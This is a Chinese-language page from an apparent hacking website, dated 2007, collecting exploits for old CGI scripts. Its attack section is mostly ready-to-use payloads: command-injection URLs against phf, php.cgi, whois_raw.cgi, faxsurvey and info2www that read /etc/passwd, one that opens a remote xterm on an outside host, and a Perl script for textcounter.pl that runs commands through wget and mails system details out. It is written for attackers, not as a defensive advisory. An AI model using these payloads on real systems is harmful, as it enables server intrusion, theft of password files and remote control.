CGI漏洞集锦
日期:2007年8月20日 作者: 查看:[大字体 中字体 小字体]-
一.phf漏洞
这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示
/etc/passwd:
lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
但是我们还能找到它吗?
二.php.cgi 2.0beta10或更早版本的漏洞=版权所有 热点网络 热点下载 热点网络学院 版权所有=
可以读nobody权限的所有文件.
lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在
/etc/master.passwd
/etc/security/passwd等.
三.whois_raw.cgi
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xter
m%20-display%20graziella.lame.org:0
四.faxsurvey
lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
五.textcounter.pl
如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.
#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\mail ${EMAIL} -sanothe
re_one";
}$text="${URL}/;IFS=\8;${CMD};echo";$text =~ s/ /\$\{IFS\}/g;#print "$text\
n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
#system({"lynx"} "lynx", $text);
六.一些版本(1.1)的info2www的漏洞
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami asswd)' - [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] 下一页
-
- CGI漏洞集锦 相关文章:
- ·显示器工厂模式的进入方法集锦
- ·软件注册码、安装序列号☆集锦
- ·你能过关吗?J2EE面试题集锦(附答案)
- ·管理格言集锦
- ·MS-SQL开发常用汇总和t-sql技巧集锦
- ·开始→运行→输入的命令集锦
- ·创新名言集锦
- ·JavaScript经典效果集锦
- ·著名公司面试考题集锦
- ·智慧火花、智慧名言名句集锦
- CGI漏洞集锦 相关软件
- ·对联集锦 V10.0
- ·世界摩托车锦标赛3
- ·花营锦阵
- ·趣味智力问题集锦
- ·免费软件集锦 V1.0
- ·读相声-精品相声段子集锦
- ·《世界花式台球锦标赛2004》免CD补丁
- ·汇锦国际酒店管理系统 V6.1.01 网络版
- ·世界花式台球锦标赛2004
- ·ASP与DHTML资料集锦
- 特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作
- 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转
- 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源:http://www.hackhome.com
上一篇:主页木马的制作方法
下一篇:SNMP漏洞威胁网络安全
精品推荐
热点TOP10
- ·netcat使用指南
- ·全面对比OmniPeek与Sniffer
- ·无线攻防:破解WEP密钥过程全解
- ·反病毒引擎设计全解
- ·PHP注入某大型网站
- ·Php+Mysql注入专题
- ·sqlexp攻击.怎么防止?
- ·Win2003服务器组网、安全管理全攻略(1)
- ·Windows组策略屏蔽U盘有妙法(图)
- ·检测和删除系统中的木马(Trojan Horse)教程
- ·104种清除木马方法
- ·IIS攻击与日志
- ·ASP漏洞大集合最新
- ·什么是注入式攻击(1)
- ·Do All in Cmd Shell (一切尽在命令行)
- ·使用 OpenSSL API 进行安全编程
- ·IP 伪 装 法
- ·禁止139/445端口连接
- ·百炼成钢-打磨你的Outpost防火墙
- ·网络钓鱼式攻击 挂QQ等级网站
特别推荐
- ·用路由器来减轻DDOS攻击危害
- ·加强边界路由器安全防护的9个步骤
- ·10种方法减少内部人员的安全风险
- ·网络安全技术 再谈跨站脚本攻击与防御
- ·禁止139/445端口连接
- ·Windows组策略屏蔽U盘有妙法(图)
- ·IIS攻击与日志
- ·ASP漏洞大集合最新
- ·网络安全常识:九招防范黑客的简单办法
- ·Webmail攻防实战
- ·认清主动防御 安全软件的困惑与走向
- ·网络安全新木桶理论与信息安全
- ·网络钓鱼式攻击 挂QQ等级网站
- ·黑客入侵具体环节
- ·IP 伪 装 法
- ·TCP端口的作用、漏洞和操作建议
- ·104种清除木马方法
- ·CGI漏洞集锦
- ·什么是注入式攻击(1)
- ·Win2003服务器组网、安全管理全攻略(1)
